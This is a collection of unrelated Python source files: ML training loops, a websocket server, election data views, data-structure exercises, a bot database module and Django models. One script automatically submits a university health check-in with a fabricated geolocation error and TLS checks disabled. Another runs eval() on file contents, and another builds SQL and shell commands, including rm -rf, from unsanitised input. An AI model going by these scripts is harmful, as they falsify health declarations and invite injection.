tf.summary.FileWriter(dir_train.log_path + '/train', session.graph)\n valid_writer = tf.summary.FileWriter(dir_train.log_path + '/valid')\n\n # 
train_writer.add_graph(tf.get_default_graph())\n\n start_time = time.time()\n for i in range(params_train.max_max_epoch):\n lr_decay = params_train.lr_decay ** max(i - params_train.max_epoch, 0.0)\n # train_obj.assign_lr(session, params_train.learning_rate * lr_decay)\n\n # print(params_train.learning_rate * lr_decay)\n\n print('\\n++++++++=========+++++++\\n')\n lr = params_train.learning_rate * lr_decay\n print(\"Epoch: %d Learning rate: %.5f\" % (i + 1, lr))\n train_loss, _, = self.run_epoch(session, global_min_loss, train_obj, train_reader, train_instances, train_writer)\n print(\"Epoch: %d Train loss: %.4f\" % (i + 1, train_loss))\n\n valid_loss, curr_min_loss = self.run_epoch(session, global_min_loss, valid_obj, valid_reader, valid_instances, valid_writer)\n if (curr_min_loss < global_min_loss):\n global_min_loss = curr_min_loss\n\n print(\"Epoch: %d Valid loss: %.4f\" % (i + 1, valid_loss))\n\n curr_time = time.time()\n print('1 epoch run takes ' + str(((curr_time - start_time) / (i + 1)) / 60) + ' minutes.')\n\n if params_train.log:\n train_writer.close()\n valid_writer.close()\n","sub_path":"global_module/implementation_module/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"118192405","text":"import json\nimport dbHandler as dbh\nfrom autobahn.twisted.websocket import WebSocketServerProtocol, \\\n\tWebSocketServerFactory\n\nclass MyServerProtocol(WebSocketServerProtocol):\n\tdef onConnect(self, request):\n\t\tprint(\"Client connecting: {0}\".format(request.peer))\n\tdef onOpen(self):\n\t\tprint(\"WebSocket connection open.\")\n\tdef onMessage(self, payload,isBinary):\n\t\tpayload=json.loads(payload.decode('utf8'))\n\t\tif payload[\"action\"]==\"PUSH\":\n\t\t\tprint(\"PUSH\")\n\t\t\tcon=dbh.Connect()\n\t\t\tif len(con.getTable(\"data\",[\"date\"],{\"date\":payload[\"date\"]}))==1:\n\t\t\t\tprint(\"updating table\")\n\t\t\t\tcon.updateTable(\"data\",{\"info\":(json.dumps(payload[\"info\"])).replace(\"\\\"\",\"\\\\\\\"\")},{\"date\":payload[\"date\"]})\n\t\t\telse:\n\t\t\t\tprint(\"creatng new entry\")\n\t\t\t\tcon.insertIntoTable(\"data\",{\"date\":payload[\"date\"],\"info\":(json.dumps(payload[\"info\"])).replace(\"\\\"\",\"\\\\\\\"\")})\n\t\t\tcon.close()\n\t\tif payload[\"action\"]==\"PULL\":\n\t\t\tdata=dbh.getTable(\"data\",[\"info\"],{\"date\":payload[\"date\"]})\n\t\t\tif len(data)==1:\n\t\t\t\tself.sendMessage(json.dumps({\"info\":data[0][\"info\"],\"action\":\"updateInfo\"}).encode('utf8'),True)\n\t\t\telse:\n\t\t\t\tself.sendMessage(json.dumps({\"action\":\"Start New Input\"}).encode('utf8'),True)\n\t\tif payload[\"action\"]==\"PURGE\":\n\t\t\tdbh.deleteFromTable(\"data\",{\"date\":payload[\"date\"]})\ndef onClose(self, wasClean, code, reason):\n\t\tprint(\"connection closed\")\nif __name__ == '__main__':\n\n\timport sys\n\n\tfrom twisted.python import log\n\tfrom twisted.internet import reactor\n\n\tlog.startLogging(sys.stdout)\n\tfactory = WebSocketServerFactory(u\"ws://127.0.0.1:5000\")\n\tfactory.protocol = MyServerProtocol\n\n\treactor.listenTCP(5000, factory)\n\treactor.run()\n","sub_path":"websocket.py","file_name":"websocket.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"575866813","text":"import requests\nimport re\nimport os\nimport time\nrequests.packages.urllib3.disable_warnings()\n\n\ndef SendText(api,Error):\n print(Error)\n 
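# ServerChan (sc.ftqq.com) push: 'text' is the notification title and 'desp' the message body shown in WeChat.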
requests.post(url=api, data={'text': '浙大健康打卡失败','desp':Error,})\n    exit()\n\n\ndef handler(event, context):\n    try:\n        ua = r'' # your own DingTalk UA; e.g. open http://www.all-tool.cn/Tools/ua/ inside DingTalk to get it\n        api = r'https://sc.ftqq.com/XXX.send' # ServerChan WeChat push API, used for failed check-in alerts; very important, be sure to set it\n        area = r'xx省 xx市 xx区' # e.g. 浙江省 温州市 鹿城区 or 北京市 北京市 东城区; turn off phone geolocation (or deny the app location permission) and pick the area manually here\n        exit() # delete this line once the settings above have been filled in\n        version=requests.get('https://pastebin.com/raw/6XCDvF71',verify=False).text\n        if version != '2020/8/30': # check for updates; GitHub access is unstable inside China\n            SendText(api, '请更新版本\\nhttps://github.com/yep96/ZJU_healthreport')\n        s = requests.Session()\n        if os.path.exists('cookies'):\n            with open('cookies') as f:\n                dict = eval(f.read())\n            s.cookies = requests.utils.cookiejar_from_dict(dict, cookiejar=None, overwrite=True)\n        else:\n            SendText(api, '云函数无法修改文件,请在本地运行一次后获取cookies文件,上传至代码目录')\n        res = s.get(url='https://healthreport.zju.edu.cn/ncov/wap/default/index',headers={'User-Agent':ua,},verify=False)\n        res.raise_for_status()\n        res.encoding = \"utf-8\"\n        if (len(re.findall('getdqtlqk',res.text)) != 15) or (len(re.findall('武汉',res.text)) != 2) or (len(re.findall('大连',res.text)) != 1) or (len(re.findall('active',res.text)) != 75):\n            SendText(api, '表单已更改,请等待更新或自行修改') # crude check for form changes via the number of regions listed under 'returned to Zhejiang from the following areas'\n        with open('data', encoding='utf-8') as f:\n            data = eval(f.read())\n        data['area'] = area\n        data['province'] = area.split()[0]\n        data['city'] = area.split()[1]\n        data['id'] = re.search(r'id\":\"(\\d*?)\"', res.text).groups()[0]\n        data['uid'] = re.search(r'uid\":\"(\\d*?)\"', res.text).groups()[0]\n        data['date'] = re.search(r'date\":\"(\\d*?)\"', res.text).groups()[0]\n        data['created'] = re.search(r'created\":\"(\\d*?)\"', res.text).groups()[0]\n        data2 = {'error': r'{\"type\":\"error\",\"message\":\"Get geolocation time out.Get ipLocation failed.\",\"info\":\"FAILED\",\"status\":0}'}\n        time.sleep(5)\n        s.post(url='https://healthreport.zju.edu.cn/ncov/wap/default/save-geo-error',data=data2,headers={'User-Agent':ua,},verify=False)\n        time.sleep(5) # wait a bit to pretend the form is being filled in; probably unnecessary\n        res = s.post(url='https://healthreport.zju.edu.cn/ncov/wap/default/save',data=data,headers={'User-Agent':ua,},verify=False)\n        res.raise_for_status()\n        res.encoding = \"utf-8\"\n        if (re.search('\"e\":0',res.text) is None): # inspect the response to see whether the check-in succeeded\n            SendText(api, '打卡失败')\n        print('打卡成功')\n    except Exception as e:\n        SendText(api,str(e))\n","sub_path":"index_Ali.py","file_name":"index_Ali.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"281479101","text":"import tensorflow as tf\nimport numpy as np\nimport types\nimport time\nimport dataset\nimport model\nimport optim\nimport decay\n\nfrom typing import Union, Callable\nfrom util.ops import softmax_loss, accuracy\n\n\nclass Estimator(object):\n    def __init__(self,\n                 dataset: dataset.DatasetBuilder,\n                 model: model.Model,\n                 optimizer: optim.Optimizer,\n                 use_fp16=True):\n        self.dataset = dataset\n        self.model = model\n        self.optimizer = optimizer\n        self.use_fp16 = use_fp16\n\n    def train(self,\n              train_batch_size: int,\n              test_batch_size: int,\n              total_steps: int,\n              test_steps: int,\n              lr_decay: decay.Decay,\n              init_callback: Union[None, Callable[[tf.Session], None]]=None,\n              logging=True):\n        total_metrics = {'global_step': [],\n                         'train/loss': [], 'train/acc/top-1': [], 'train/acc/top-5': [],\n                         'test/loss': [], 'test/acc/top-1': [], 'test/acc/top-5': []}\n\n        # reset all before graphs\n        tf.reset_default_graph()\n\n        # get operations for training and testing\n        train_ops = self._build_train_ops(train_batch_size, 
total_steps, lr_decay)\n tf.get_variable_scope().reuse_variables()\n test_ops = self._build_test_ops(test_batch_size)\n\n with tf.Session() as sess:\n # initialize global variables randomly\n tf.initializers.global_variables().run()\n\n # handle init callback\n if init_callback: init_callback(sess)\n\n # variables to record ETA and to calculate each metrics\n last_time_stamp = time.time()\n batch_train_metrics = {'loss': [], 'acc/top-1': [], 'acc/top-5': []}\n\n print('[*] Start training the model...')\n for step in range(1, total_steps + 1):\n # train the model and get metrics\n metrics = sess.run(train_ops)\n\n for k, v in metrics.items():\n if k in batch_train_metrics:\n batch_train_metrics[k].append(v)\n\n if step % test_steps == 0:\n # evaluate the model with test dataset\n test_metrics = sess.run(test_ops)\n\n # add to the total-metrics\n total_metrics['global_step'].append(step)\n for k, v in batch_train_metrics.items():\n total_metrics['train/' + k].append(np.mean(v))\n for k, v in test_metrics.items():\n total_metrics['test/' + k].append(v)\n\n if logging:\n print(f'[*] Iteration {step: 7d}/{total_steps: 7d}'\n f' has been estimated. ETA: {time.time() - last_time_stamp:.2f}')\n\n # reset all temporal variables to record and to calculate again\n last_time_stamp = time.time()\n batch_train_metrics = {'loss': [], 'acc/top-1': [], 'acc/top-5': []}\n\n # get all global variables from session\n global_variables = sess.run({v.name.split(':')[0]: v for v in tf.global_variables()})\n\n return total_metrics, global_variables\n\n def _build_train_ops(self,\n batch_size: int,\n total_steps: int,\n lr_decay: decay.Decay):\n # get tensors from dataset and predict the output\n features, labels = (self.dataset\n .build(batch_size, is_training=True)\n .make_one_shot_iterator()\n .get_next())\n if self.use_fp16: features = tf.cast(features, tf.float16)\n\n logits = self.model.call(features, is_training=True)\n if self.use_fp16: logits = tf.cast(logits, tf.float32)\n\n # calculate loss and accuracy of prediction\n loss_op = softmax_loss(logits, labels)\n acc_1_op = accuracy(logits, labels, top_k=1)\n acc_5_op = accuracy(logits, labels, top_k=5)\n\n # train by optimizer with learning rate decay\n global_step = tf.train.get_or_create_global_step()\n with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\n train_op = self.optimizer.minimize(\n loss_op,\n lr_decay.decay(global_step, total_steps),\n global_step,\n loss_scale=128 if self.use_fp16 else 1)\n\n return {'loss': loss_op, 'acc/top-1': acc_1_op, 'acc/top-5': acc_5_op, 'train': train_op}\n\n def _build_test_ops(self, batch_size: int):\n # get tensors from dataset and predict the output\n features, labels = (self.dataset\n .build(batch_size, is_training=False)\n .make_one_shot_iterator()\n .get_next())\n logits = self.model.call(features, is_training=False)\n\n # calculate loss and accuracy of prediction\n loss_op = softmax_loss(logits, labels)\n acc_1_op = accuracy(logits, labels, top_k=1)\n acc_5_op = accuracy(logits, labels, top_k=5)\n\n return {'loss': loss_op, 'acc/top-1': acc_1_op, 'acc/top-5': acc_5_op}\n","sub_path":"src/util/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"565886339","text":"from morepath.request import Response\nfrom onegov.ballot import Election\nfrom onegov.core.csv import convert_list_of_dicts_to_csv\nfrom onegov.core.custom import json\nfrom onegov.core.security import 
Public\nfrom onegov.core.utils import normalize_for_url\nfrom onegov.election_day import _\nfrom onegov.election_day import ElectionDayApp\nfrom onegov.election_day.layouts import ElectionLayout\nfrom onegov.election_day.utils import add_last_modified_header\nfrom onegov.election_day.utils.election import get_connection_results_api\nfrom onegov.election_day.utils.election.lists import \\\n    get_aggregated_list_results\n\n\n@ElectionDayApp.html(\n    model=Election,\n    name='data',\n    template='election/data.pt',\n    permission=Public\n)\ndef view_election_data(self, request):\n\n    \"\"\" The main view. \"\"\"\n\n    layout = ElectionLayout(self, request, 'data')\n\n    return {\n        'election': self,\n        'layout': layout\n    }\n\n\n@ElectionDayApp.view(\n    model=Election,\n    name='data-json',\n    permission=Public\n)\ndef view_election_data_as_json(self, request):\n\n    \"\"\" View the raw data as JSON. \"\"\"\n\n    @request.after\n    def add_last_modified(response):\n        add_last_modified_header(response, self.last_modified)\n\n    return Response(\n        json.dumps(self.export(), sort_keys=True, indent=2).encode('utf-8'),\n        content_type='application/json',\n        content_disposition='inline; filename={}.json'.format(\n            normalize_for_url(self.title)\n        )\n    )\n\n\n@ElectionDayApp.view(\n    model=Election,\n    name='data-csv',\n    permission=Public\n)\ndef view_election_data_as_csv(self, request):\n\n    \"\"\" View the raw data as CSV. \"\"\"\n\n    @request.after\n    def add_last_modified(response):\n        add_last_modified_header(response, self.last_modified)\n\n    return Response(\n        convert_list_of_dicts_to_csv(self.export()),\n        content_type='text/csv',\n        content_disposition='inline; filename={}.csv'.format(\n            normalize_for_url(self.title)\n        )\n    )\n\n\n@ElectionDayApp.view(\n    model=Election,\n    name='data-parties',\n    permission=Public\n)\ndef view_election_parties_data_as_csv(self, request):\n\n    \"\"\" View the raw parties data as CSV. \"\"\"\n\n    @request.after\n    def add_last_modified(response):\n        add_last_modified_header(response, self.last_modified)\n\n    return Response(\n        convert_list_of_dicts_to_csv(self.export_parties()),\n        content_type='text/csv',\n        content_disposition='inline; filename={}.csv'.format(\n            normalize_for_url(\n                '{}-{}'.format(\n                    self.title,\n                    request.translate(_(\"Parties\")).lower()\n                )\n            )\n        )\n    )\n\n\n@ElectionDayApp.json(\n    model=Election,\n    name='data-aggregated-lists',\n    permission=Public\n)\ndef view_election_aggregated_lists_data(self, request):\n\n    \"\"\" View the lists as JSON. Used for the lists bar chart. \"\"\"\n\n    return get_aggregated_list_results(self, request.session)\n\n\n@ElectionDayApp.json(\n    model=Election,\n    name='data-list-connections',\n    permission=Public\n)\ndef view_election_aggregated_connections_data(self, request):\n\n    \"\"\" View the list connections as JSON. \"\"\"\n\n    return get_connection_results_api(self, request.session)\n","sub_path":"src/onegov/election_day/views/election/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"46341760","text":"\n\"\"\"Depth-First Search Package\"\"\"\n\n\ndef dfs(graph, start):\n    \"\"\"Depth-First Search\"\"\"\n    # Similar to breadth-first search but differs from it in two ways:\n    # 1. it uses a stack (LIFO) instead of a queue, and\n    # 2. 
it delays checking whether a vertex has been discovered until the vertex is popped from\n # the stack rather than making this check before pushing the vertex.\n path = []\n stack = [start]\n\n while stack:\n vertex = stack.pop()\n\n if vertex not in path:\n path.append(vertex)\n stack.extend(graph[vertex])\n\n return path\n","sub_path":"week1/dfs.py","file_name":"dfs.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"116328893","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Question 1:\n# Implement a stack that supports push and pop operations using standard enqueue and dequeue operations of the queue.\n\n# In[9]:\n\n\nfrom queue import Queue \n \nclass Stack: \n \n def __init__(self): \n \n # Two inbuilt queues \n self.q1 = Queue() \n self.q2 = Queue() \n \n # To maintain current number \n # of elements \n self.curr_size = 0\n \n def push(self, x): \n self.curr_size += 1\n \n # Push x first in empty q2 \n self.q2.put(x) \n \n # Push all the remaining \n # elements in q1 to q2. \n while (not self.q1.empty()): \n self.q2.put(self.q1.queue[0]) \n self.q1.get() \n \n # swap the names of two queues \n self.q = self.q1 \n self.q1 = self.q2 \n self.q2 = self.q \n \n def pop(self): \n \n # if no elements are there in q1 \n if (self.q1.empty()): \n return\n self.q1.get() \n self.curr_size -= 1\n \n def top(self): \n if (self.q1.empty()): \n return -1\n return self.q1.queue[0] \n \n def size(self): \n return self.curr_size \n \ns = Stack() \ns.push(1) \ns.push(2) \ns.push(3) \n \nprint(\"current size: \", s.size()) \nprint(s.top()) \ns.pop() \nprint(s.top()) \ns.pop() \nprint(s.top()) \n \nprint(\"current size: \", s.size())\n\n\n# # Question 2:\n# Implement a queue using a single linked list. 
(Hint: Enqueuing happens at the tail of the list, and the dequeuing of items happens at the head of the list.)\n\n# In[8]:\n\n\nclass Node: \n \n def __init__(self, data): \n self.data = data \n self.next = None\n \nclass Queue: \n \n def __init__(self): \n self.front = self.rear = None\n \n def isEmpty(self): \n return self.front == None\n \n # Method to add an item to the queue \n def EnQueue(self, item): \n temp = Node(item) \n \n if self.rear == None: \n self.front = self.rear = temp \n return\n self.rear.next = temp \n self.rear = temp \n \n # Method to remove an item from queue \n def DeQueue(self): \n \n if self.isEmpty(): \n return\n temp = self.front \n self.front = temp.next\n \n if(self.front == None): \n self.rear = None\n\nq = Queue() \nq.EnQueue(10) \nq.EnQueue(20) \nq.DeQueue() \nq.DeQueue() \nq.EnQueue(30) \nq.EnQueue(40) \nq.EnQueue(50) \nq.DeQueue() \nprint(\"Queue Front \" + str(q.front.data)) \nprint(\"Queue Rear \" + str(q.rear.data))\n\n\n# # Question 3:\n# Given a positive number n, efficiently generate binary numbers between 1 and n using the queue data structure in linear time.\n# \n# Example:\n# \n# Input:\n# \n# n = 10\n# \n# Output :\n# \n# 1 10 11 100 101 110 111 1000 1001 1010 1011 1100 1101 1110 1111 10000\n\n# In[12]:\n\n\nfrom collections import deque\n \ndef generate(n):\n \n # create an empty queue and enqueue 1\n q = deque()\n q.append('1')\n \n # run `n` times\n for i in range(n):\n # remove the front element\n front = str(q.popleft())\n \n # append 0 and 1 to the front element of the queue and\n # enqueue both strings\n q.append(front + '0')\n q.append(front + '1')\n \n # print the front element\n print(front, end=' ')\n \n \nn = 10\ngenerate(n)\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Week_9.py","file_name":"Week_9.py","file_ext":"py","file_size_in_byte":3378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"502178575","text":"#NEED TO COLLECT ALL WORK HOURS AND REPORT THOSE UNCONNECTED TO WORK ORDERS AND TASKS, CONNECT THEM TO CLIENT AS WELL\nimport tacticenv\nimport os, sys, calendar, dateutil, datetime, time, getopt, pprint, re, math\nfrom pyasm.biz import *\n\n\nopts, login = getopt.getopt(sys.argv[1], '-m')\nopts, codes_to_update = getopt.getopt(sys.argv[2], '-m')\nopts, timestamp = getopt.getopt(sys.argv[3], '-m')\nnote_codes = codes_to_update.split(',')\nmake_ems = ''\nseen_block = '[%s,%s]' % (login,timestamp)\nfor code in note_codes:\n if make_ems == '':\n make_ems = \"update note set seen_by = 'SEEN:' where code = '%s' and (seen_by is NULL or seen_by = '');\" % (code)\n make_ems = \"%s\\nupdate note set seen_by = seen_by || '%s' where code = '%s';\" % (make_ems, seen_block, code)\n else:\n make_ems = \"%s\\nupdate note set seen_by = 'SEEN:' where code = '%s' and (seen_by is NULL or seen_by = '');\" % (make_ems, code)\n make_ems = \"%s\\nupdate note set seen_by = seen_by || '%s' where code = '%s';\" % (make_ems, seen_block, code)\nnote_updater_path = '/var/www/html/note_updating/%s_note_update.sql' % login\nif os.path.exists(note_updater_path):\n os.system('rm -rf %s' % note_updater_path)\nf = open(note_updater_path, 'w')\nf.write(str(make_ems))\nf.close()\nos.system(\"psql -U postgres sthpw < '''%s'''\" % note_updater_path) \n","sub_path":"manual_updaters/add_seen_bys.py","file_name":"add_seen_bys.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"339803891","text":"# coding: utf-8\n\nfrom 
turtle import *\n\ndef draw_triangle(points, color, turtle):\n turtle.fillcolor(color)\n turtle.up()\n turtle.goto(points[0])\n turtle.down()\n turtle.begin_fill()\n turtle.goto(points[1])\n turtle.goto(points[2])\n turtle.goto(points[0])\n turtle.end_fill()\n\ndef get_mid(p1, p2):\n return ((p1[0] + p2[0]) / 2, (p1[1] + p2[1]) / 2)\n\ndef sierpinksi(points, degree, turtle):\n colormap = ['blue', 'red', 'green', 'white', 'yellow', 'violet', 'orange']\n draw_triangle(points, colormap[degree], turtle)\n\n if degree > 0:\n sierpinksi([points[0],\n get_mid(points[0], points[1]),\n get_mid(points[0], points[2])],\n degree - 1, turtle)\n sierpinksi([points[1],\n get_mid(points[0], points[1]),\n get_mid(points[1], points[2])],\n degree - 1, turtle)\n sierpinksi([points[2],\n get_mid(points[2], points[1]),\n get_mid(points[0], points[2])],\n degree - 1, turtle)\n\n\nturtle = Turtle()\nwin = turtle.getscreen()\npoints = [(-500, -250), (0, 500), (500, -250)]\nsierpinksi(points, 5, turtle)\nwin.exitonclick()","sub_path":"Wk4/sierpinski_triangle.py","file_name":"sierpinski_triangle.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"105269873","text":"#python program to print positive numbers in a list\r\n\r\nnumlist = []\r\n\r\nx=0\r\n\r\n\r\nnumber =int(input(\"enter the total number of list elements: \"))\r\nfor i in range(1,number+1):\r\n value =int(input(\"enter the value of %d element: \" %i))\r\n numlist.append(value)\r\n\r\n\r\n\r\nprint(\"\\npositive numbers in this list are: \")\r\nwhile(x < number):\r\n if(numlist[x] >= 0):\r\n print(numlist[x],end =' ')\r\n x = x+1 \r\n","sub_path":"practice 0.0.py","file_name":"practice 0.0.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"24058885","text":"from collections import defaultdict\r\nlat_eng = defaultdict(list)\r\nfor i in range(int(input())):\r\n eng, lat_translate_part = input().split(' - ')\r\n lat_translate = lat_translate_part.split(', ')\r\n for lat in lat_translate:\r\n lat_eng[lat].append(eng)\r\n\r\nprint(len(lat_eng))\r\nfor lat, eng_translate in sorted(lat_eng.items()):\r\n print(lat + ' - ' + ', '.join(eng_translate))\r\n","sub_path":"4 - dict/task2 - condition.py","file_name":"task2 - condition.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"285897539","text":"\"\"\"\nNeed to move from SQLite to PostgreSQL Database -- что-то уже есть\nThink about merge tasks\n\"\"\"\n\nimport sqlite3 as sqlite\nfrom distutils import dist\nimport time\nimport random as rd\nimport psycopg2\nfrom simplejson import loads, dumps\nfrom configs import db_configs\nfrom psycopg2.extras import Json\nimport logging\nfrom classes import Task\n\ndb = psycopg2.connect(**db_configs)\ncur = db.cursor()\n\n#\"CREATE TABLE users(user_id SERIAL, user_name TEXT, vk_uid INTEGER, tg_uid INTEGER);\"\n\ndef get_last_user_id():\n cur.execute(\"SELECT * FROM users ORDER BY id DESC LIMIT 1;\")\n return cur.fetchone()\n\n\ndef add_vk_id(user_id, vk_uid):\n cur.execute(\"\"\"\n UPDATE users SET vk_uid = %s\n WHERE user_id = %s;\n \"\"\", \n (vk_uid, user_id))\n db.commit()\n\n\ndef add_tg_id(user_id, tg_uid):\n cur.execute(\"\"\"\n UPDATE users SET tg_uid = %s\n WHERE user_id = %s;\n \"\"\", \n (tg_uid, user_id))\n db.commit()\n\n\ndef add_user(user_name, mode, chat_uid):\n 
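    # Descriptive note: creates the user row only if the user_name is free, then links the chat id for the requested platform ('vk' maps to VK, anything else to Telegram).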
cur.execute(\"SELECT * FROM users WHERE user_name = %s\", (user_name,))\n if not cur.fetchone():\n cur.execute(\"\"\"\n INSERT INTO users (user_name)\n VALUES (%s);\n \"\"\",\n (user_name,))\n db.commit()\n user_id = get_last_user_id()\n if mode == 'vk':\n add_vk_id(user_id, chat_uid)\n else:\n add_tg_id(user_id, chat_uid)\n else:\n logging.critical('User already exists')\n\n\"\"\"\nСорян, что на русском\nЧе за quot???\nНигде про это нет\nИ kickass???\nУ нас нет таблички motivate...\n\"\"\"\n\ndef quot():\n i = rd.randint(1, 767)\n print(i)\n db = sqlite.connect(\"C:/Users/Nick/Desktop/clientbase.db\")\n cur = db.cursor()\n cur.execute(\"SELECT * FROM Quotations WHERE id = (?)\", (i,))\n string = cur.fetchone()\n return (str(string[1]) + string[2])\n db.close()\n\n\ndef kickass():\n i = rd.randint(1, 767)\n print(i)\n db = sqlite.connect(\"C:/Users/Nick/Desktop/clientbase.db\")\n cur = db.cursor()\n cur.execute(\"SELECT * FROM motivate WHERE id = (?)\", (i,))\n db.close()\n\n\"\"\"\nПошел осмысленный код\n\"\"\"\n\n#\"CREATE TABLE task_history(id SERIAL PRIMARY KEY, task JSONB, uid INTEGER);\"\n\ndef get_last_task_id():\n cur.execute(\"SELECT * FROM task_history ORDER BY id DESC LIMIT 1;\")\n return cur.fetchone()\n\n\"\"\"\nСюда придет class Task\n\"\"\"\n\ndef add_task(user_id, task):\n task_json = task.json()\n cur.execute(\"\"\"\n INSERT INTO task_history (task, uid)\n VALUES (%s, %s);\n \"\"\",\n (task_json, user_id))\n db.commit()\n\ndef set_todo(user_id, activity_name, start_time, finish_time, description, frequency):\n db = sqlite.connect(\"C:/Users/Nick/Desktop/clientbase.db\")\n cur = db.cursor()\n cur.execute(\"SELECT * FROM users WHERE user_id = ?\", (str(user_id),))\n is_todo = cur.fetchone()\n if is_todo[5]:\n cur.execute(\n \"INSERT INTO '{table}' (activity_name, start_time, finish_time, description, frequency) VALUES (?,?,?,?,?)\".format(table=user_id), (activity_name, start_time, finish_time, description, frequency,))\n db.commit()\n else:\n s = '''CREATE TABLE {table} (id\tINTEGER,activity_name\tTEXT, start_time\tREAL, finish_time\tREAL, description\tTEXT, frequency\tINTEGER, PRIMARY KEY(id))'''.format(table=user_id)\n cur.execute(s)\n cur.execute(\"UPDATE users SET todos_t_name = {name} WHERE user_id = {id}\".format(id=user_id, name=user_id))\n db.commit()\n db.close()\n\n\ndef get_todo(user_id):\n db = sqlite.connect(\"clientbase.db\")\n cur = db.cursor()\n try:\n cur.execute(\"SELECT * FROM '{table}'\".format(table=str(time.gmtime(time.time()).tm_mon)+'-'+str(time.gmtime(time.time()).tm_mday)))\n except Exception as e:\n print(e)\n cur.execute(\"CREATE TABLE %s(id INTEGER PRIMARY KEY, activity_name TEXT,\"\n \"start_time REAL, finish_time REAL,\"\n \" description TEXT\" % str(str(time.gmtime(time.time())[1])+'-'+str(time.gmtime(time.time())[2])))\n return None\n data = cur.fetchall()\n return data\n","sub_path":"code/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"302897238","text":"# -*- coding: UTF-8 -*-\nfrom __future__ import unicode_literals\n\nimport ast\n\nfrom django.db import models\n\n# Create your models here.\nclass JsonResponseStatus(object):\n erroDic = {\n '200': '成功',\n #300-399 for usererror\n '300': '用户名已存在',\n '301':'密码长度不能少于6位',\n '302':'用户不存在',\n '303': '密码错误',\n '304':'用户信息保存失败',\n '305':'请先登录',\n '306':'该手机号已经被绑定',\n '307':'手机号码不合法',\n '308':'非法用户名',\n #400-499 for business\n '400':'删除图片失败',\n '401':'发布信息保存失败',\n 
'402':'搜索不到相关内容',\n #500-599 for http error\n '500':'请求参数错误',\n # 600-699 for sms error\n '600':'短信发送失败',\n '601':'验证码已过期',\n '602': '验证码错误',\n # 700-700 for app update\n '700':'版本已经是最新',\n }\n\n def __init__(self, erro_code):\n self.erro_code = erro_code\n self.erro_msg = self.erroDic[str(erro_code)]\n\ndef parse_list(value):\n list = value.split(',')\n result = []\n for s in list:\n if s != '':\n result.append(s)\n return result\n\n\nclass ListField(models.TextField):\n # __metaclass__ = models.SubfieldBase\n description = \"Stores a python list\"\n\n def __init__(self, *args, **kwargs):\n super(ListField, self).__init__(*args, **kwargs)\n\n def from_db_value(self, value, expression, connection, context):\n if value is None:\n return value\n return parse_list(value)\n\n def to_python(self, value):\n if isinstance(value, list):\n return value\n\n if value is None:\n return value\n\n return parse_list(value)\n\n\n def get_prep_value(self, value):\n result = ''\n for x in value:\n result = result+x + ','\n return result","sub_path":"commonfunction/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"226843050","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport lightgbm as lgb\nfrom sklearn import datasets\nfrom sklearn import metrics\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import StratifiedKFold, KFold\nimport numpy.random as rd\nfrom sklearn.metrics import accuracy_score, recall_score, precision_score, f1_score\nfrom sklearn.model_selection import train_test_split\nimport optuna, os, uuid, pickle\n\ndf = pd.read_feather('val_nms030_tta7_first_5models_soft_prob.feather')\ntarget = df.target\n\ndef target_reverse(value):\n return 1 - value\n\ntarget = target.map(target_reverse)\ntmp_df = df[df.columns.drop('target')]\n\n# taken from https://www.kaggle.com/kenmatsu4/using-trained-booster-from-lightgbm-cv-w-callback\nclass ModelExtractionCallback(object):\n \"\"\"Callback class for retrieving trained model from lightgbm.cv()\n NOTE: This class depends on '_CVBooster' which is hidden class, so it might doesn't work if the specification is changed.\n \"\"\"\n\n def __init__(self):\n self._model = None\n\n def __call__(self, env):\n # Saving _CVBooster object.\n self._model = env.model\n\n def _assert_called_cb(self):\n if self._model is None:\n # Throw exception if the callback class is not called.\n raise RuntimeError('callback has not called yet')\n\n @property\n def boosters_proxy(self):\n self._assert_called_cb()\n # return Booster object\n return self._model\n\n @property\n def raw_boosters(self):\n self._assert_called_cb()\n # return list of Booster\n return self._model.boosters\n\n @property\n def best_iteration(self):\n self._assert_called_cb()\n # return boosting round when early stopping.\n return self._model.best_iteration\n\nrd_seed = 42\nrd.seed(rd_seed)\n\nX_train, y_train = tmp_df, target\nlgb_train = lgb.Dataset(X_train, y_train)\nextraction_cb = ModelExtractionCallback()\n\ncallbacks = [\n extraction_cb,\n]\n\nbooster_name = 'models/booster_for_val_nms030_tta7_first_5models_soft_prob.pkl'\n\nlgbm_params = {\n 'boosting': 'gbdt',\n 'objective': 'binary',\n 'metric': {'binary_logloss'},\n 